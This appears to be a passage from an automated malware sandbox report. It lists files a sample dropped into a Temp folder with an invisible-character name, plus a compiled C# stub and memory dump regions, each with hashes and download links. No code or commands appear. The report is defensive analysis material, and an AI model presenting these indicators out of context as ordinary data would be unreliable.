Filesize
376KB

MD5
fa986067ac89f925fd06726a3db12f79

SHA1
67bb26c31d81e1309464e7680a464b5ebe21ed21

SHA256
59ffb043d3282972274d71c7fe540b3cb0ace6e74322cd593c6f623a8362256a

SHA512
17f944642079d49a55e88034c71c7620d8456fbe3d0c121fbf454abf99634c96c4486b16ad7512edfc48b38b79884648ef014a99b997ba77ca2e1987d25334fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Desktop\LockSplit.jpeg

Filesize
705KB

MD5
0028ee72625390f25ea9fc0fafb3506d

SHA1
1d83b0dca6f681626cc7404c251526a5f773c56d

SHA256
6e3b67d6f6c0c12d12fe1a96cdf4ec7c6cbd48db866525810983c69886b36710

SHA512
bb6c5e29d38ac27d8b71151761e9d83a5a03575bc58837ca6112f46404d7bb05990495e17e6307375654453f2cf20979f2aed619a945a5a3f35b2a82909e51de

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Desktop\RemoveClose.mp4

Filesize
446KB

MD5
f471d91b177f030f137aeedc6a707124

SHA1
b6432e9520f6ea1a58785cd991ab1997da1e528d

SHA256
010c523f911b2298b8eb1d4ec8aacb02b30a750d794ad58ec37729d9383c9c1f

SHA512
5fe9e2375de6e02781ff78ba0f3010d5246c8bacc49b772069b00b3d8ba45af5c6123c1a4579b8a17af929600b52f4856d8ec0fc5222cf18017651ded03eee8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Documents\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Documents\CheckpointFind.txt

Filesize
229KB

MD5
520d6c9fcdfe962d08e5d721675ef360

SHA1
ed86c9657cde39051b9de97b2230503e1d85b672

SHA256
a6243b248c40e3bbb3bb360a8f3b52b0ce1b0f7340728b6ed108b506d39ecf9d

SHA512
a808273c30b4d6e38b88c71714f99c6db0333fb3dbc418d4cc3a412a92eec2b0a3d306c71692130680577e68a71abc48a68efe1b5ae1b1e55ce3825d2a21ed10

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Documents\ConvertDismount.docx

Filesize
221KB

MD5
3276dec58129ee6f769955c143b9c28d

SHA1
858a8d3064218411b4d2abf4efdb0f2006a67a7b

SHA256
4a8dee5c1a60e6c2f8ebf8d4ce45261155a742c7fa22c0c16de69baec46e5417

SHA512
e47057ddb606ed496307635327ae7b004a02fbc3caf78aadd043621a1b1a8622a80d2d66662a43dd3c6b752df16d0d41638a5bf95c9163a1250160fdfb6650ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Documents\Files.docx

Filesize
11KB

MD5
4a8fbd593a733fc669169d614021185b

SHA1
166e66575715d4c52bcb471c09bdbc5a9bb2f615

SHA256
714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

SHA512
6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Documents\FindRegister.xls

Filesize
379KB

MD5
45d74a60c91ac19e2a7a06be05b57dd9

SHA1
3edf4630fa85a7b39d4360446da4bb290d25fab3

SHA256
a386f3abefd83a15427fcef63cf0a68bc8f0eea695bfb866cd6388ed517de3d9

SHA512
cf8f2ae56cdbed4a4d8f5658009f203d41679dbd391a55bf13a2a4e1cf07dba20fa41debf1a14a10172bee982323f7bc4960f3628daef18cfcf38ff1f4c0df69

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Documents\JoinSave.txt

Filesize
316KB

MD5
69ba9064f7cf06a7078a064de6cee51e

SHA1
b0b8f6d756a9703970d8e3c1892b2ac5b2981877

SHA256
782adbe7c7168d9420c9c30bb071a172ec44f147abdd793cfedf3e619bfa9a4b

SHA512
90907b130cdec5c3556b76984a6bcf146179ab66dc98b811c9cb60ae72c776e085965c30340de9754edf57dcc8fd3d51066520f04f7d2c8dc4fb71416fb3a4e5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3bs1dx1z\3bs1dx1z.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3bs1dx1z\3bs1dx1z.cmdline

Filesize
607B

MD5
813656e3dca41bc319b3cf619a19d1d3

SHA1
2e9f25d19e1d4db5bcef605a2c54d4bb7635521f

SHA256
8edbb06219761a35ab9e4d916a88da2d54a82d27888774a87a9cf0d0d7529b77

SHA512
23a69bd440863992972804ba0f2927e90678c6a92232a47f098979ee358d2e151a7738548dfb35870dcdb45f4b1bd5089f136815f9e48c69539601b9b63cb2bf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3bs1dx1z\CSC27731D8A4C4F4150BDDA1E263A5A8EF.TMP

Filesize
652B

MD5
cb5720da68eaf391e4845f9e87f81c40

SHA1
68badccc8bc9a654bb8a335fb8bed4786db1d7d0

SHA256
df98c0309898f07be46840515552c1b46ceba04a840e012f3e3244934c55a49b

SHA512
2f0f7aaa30958510dda6354ce9f61cb2352490774c6b86ea098d90441a94529b9437232d0a663c9c8daffdc6508ce04b96b966bbdc5b3d47ed57bcaa0d1ac460

Download Submit
memory/2868-100-0x00000273277E0000-0x0000027327802000-memory.dmp

Filesize
136KB

Download
memory/3204-107-0x0000020ABDE50000-0x0000020ABDEC6000-memory.dmp

Filesize
472KB

Download
memory/4308-62-0x00007FF8725B0000-0x00007FF872726000-memory.dmp

Filesize
1.5MB

Download
memory/4308-26-0x00007FF863310000-0x00007FF8638FE000-memory.dmp

Filesize
5.9MB

Download
memory/4308-225-0x00007FF872C10000-0x00007FF872C43000-memory.dmp

Filesize
204KB

Download
memory/4308-305-0x00007FF872A70000-0x00007FF872B3D000-memory.dmp

Filesize
820KB

Download
memory/4308-99-0x00007FF876310000-0x00007FF876329000-memory.dmp

Filesize
100KB

Download
memory/4308-549-0x00007FF876360000-0x00007FF876379000-memory.dmp

Filesize
100KB

Download
memory/4308-376-0x00007FF872490000-0x00007FF8725AC000-memory.dmp

Filesize
1.1MB

Download
memory/4308-373-0x00007FF862DE0000-0x00007FF863302000-memory.dmp

Filesize
5.1MB

Download
memory/4308-374-0x00007FF872BF0000-0x00007FF872C04000-memory.dmp

Filesize
80KB

Download
memory/4308-362-0x00007FF863310000-0x00007FF8638FE000-memory.dmp

Filesize
5.9MB

Download
memory/4308-378-0x0000022434050000-0x0000022434572000-memory.dmp

Filesize
5.1MB

Download
memory/4308-75-0x00007FF862DE0000-0x00007FF863302000-memory.dmp

Filesize
5.1MB

Download
memory/4308-363-0x00007FF876630000-0x00007FF876654000-memory.dmp

Filesize
144KB

Download
memory/4308-71-0x00007FF876630000-0x00007FF876654000-memory.dmp

Filesize
144KB

Download
memory/4308-551-0x00007FF8725B0000-0x00007FF872726000-memory.dmp

Filesize
1.5MB

Download
memory/4308-69-0x00007FF872C10000-0x00007FF872C43000-memory.dmp

Filesize
204KB

Download
memory/4308-68-0x00007FF863310000-0x00007FF8638FE000-memory.dmp

Filesize
5.9MB

Download
memory/4308-66-0x00007FF876300000-0x00007FF87630D000-memory.dmp

Filesize
52KB

Download
memory/4308-64-0x00007FF876310000-0x00007FF876329000-memory.dmp

Filesize
100KB

Download
memory/4308-76-0x0000022434050000-0x0000022434572000-memory.dmp

Filesize
5.1MB

Download
memory/4308-60-0x00007FF876330000-0x00007FF876353000-memory.dmp

Filesize
140KB

Download
memory/4308-58-0x00007FF876360000-0x00007FF876379000-memory.dmp

Filesize
100KB

Download
memory/4308-56-0x00007FF876380000-0x00007FF8763AD000-memory.dmp

Filesize
180KB

Download
memory/4308-33-0x00007FF8763B0000-0x00007FF8763BF000-memory.dmp

Filesize
60KB

Download
memory/4308-31-0x00007FF876630000-0x00007FF876654000-memory.dmp

Filesize
144KB

Download
memory/4308-72-0x00007FF872A70000-0x00007FF872B3D000-memory.dmp

Filesize
820KB

Download
memory/4308-85-0x00007FF8725B0000-0x00007FF872726000-memory.dmp

Filesize
1.5MB

Download
memory/4308-86-0x00007FF872490000-0x00007FF8725AC000-memory.dmp

Filesize
1.1MB

Download
memory/4308-82-0x00007FF8762F0000-0x00007FF8762FD000-memory.dmp

Filesize
52KB

Download
memory/4308-81-0x00007FF876330000-0x00007FF876353000-memory.dmp

Filesize
140KB

Download
memory/4308-78-0x00007FF876380000-0x00007FF8763AD000-memory.dmp

Filesize
180KB

Download
memory/4308-79-0x00007FF872BF0000-0x00007FF872C04000-memory.dmp

Filesize
80KB

Download
memory/4308-508-0x00007FF876630000-0x00007FF876654000-memory.dmp

Filesize
144KB

Download
memory/4308-513-0x00007FF8725B0000-0x00007FF872726000-memory.dmp

Filesize
1.5MB

Download
memory/4308-507-0x00007FF863310000-0x00007FF8638FE000-memory.dmp

Filesize
5.9MB

Download
memory/4308-545-0x00007FF863310000-0x00007FF8638FE000-memory.dmp

Filesize
5.9MB

Download
memory/4308-559-0x00007FF872490000-0x00007FF8725AC000-memory.dmp

Filesize
1.1MB

Download
memory/4308-556-0x00007FF862DE0000-0x00007FF863302000-memory.dmp

Filesize
5.1MB

Download
memory/4308-555-0x00007FF872A70000-0x00007FF872B3D000-memory.dmp

Filesize
820KB

Download
memory/4308-554-0x00007FF872C10000-0x00007FF872C43000-memory.dmp

Filesize
204KB

Download
memory/4308-553-0x00007FF876300000-0x00007FF87630D000-memory.dmp

Filesize
52KB

Download
memory/4308-552-0x00007FF876310000-0x00007FF876329000-memory.dmp

Filesize
100KB

Download
memory/4308-550-0x00007FF876330000-0x00007FF876353000-memory.dmp

Filesize
140KB

Download
memory/4308-548-0x00007FF876380000-0x00007FF8763AD000-memory.dmp

Filesize
180KB

Download
memory/4308-547-0x00007FF8763B0000-0x00007FF8763BF000-memory.dmp

Filesize
60KB

Download
memory/4308-546-0x00007FF876630000-0x00007FF876654000-memory.dmp

Filesize
144KB

Download
memory/4308-558-0x00007FF8762F0000-0x00007FF8762FD000-memory.dmp

Filesize
52KB

Download
memory/4308-557-0x00007FF872BF0000-0x00007FF872C04000-memory.dmp

Filesize
80KB

Download
memory/4320-383-0x00000239EF450000-0x00000239EF458000-memory.dmp

Filesize
32KB

Download
memory/4876-94-0x00000247937C0000-0x0000024793938000-memory.dmp

Filesize
1.5MB

Download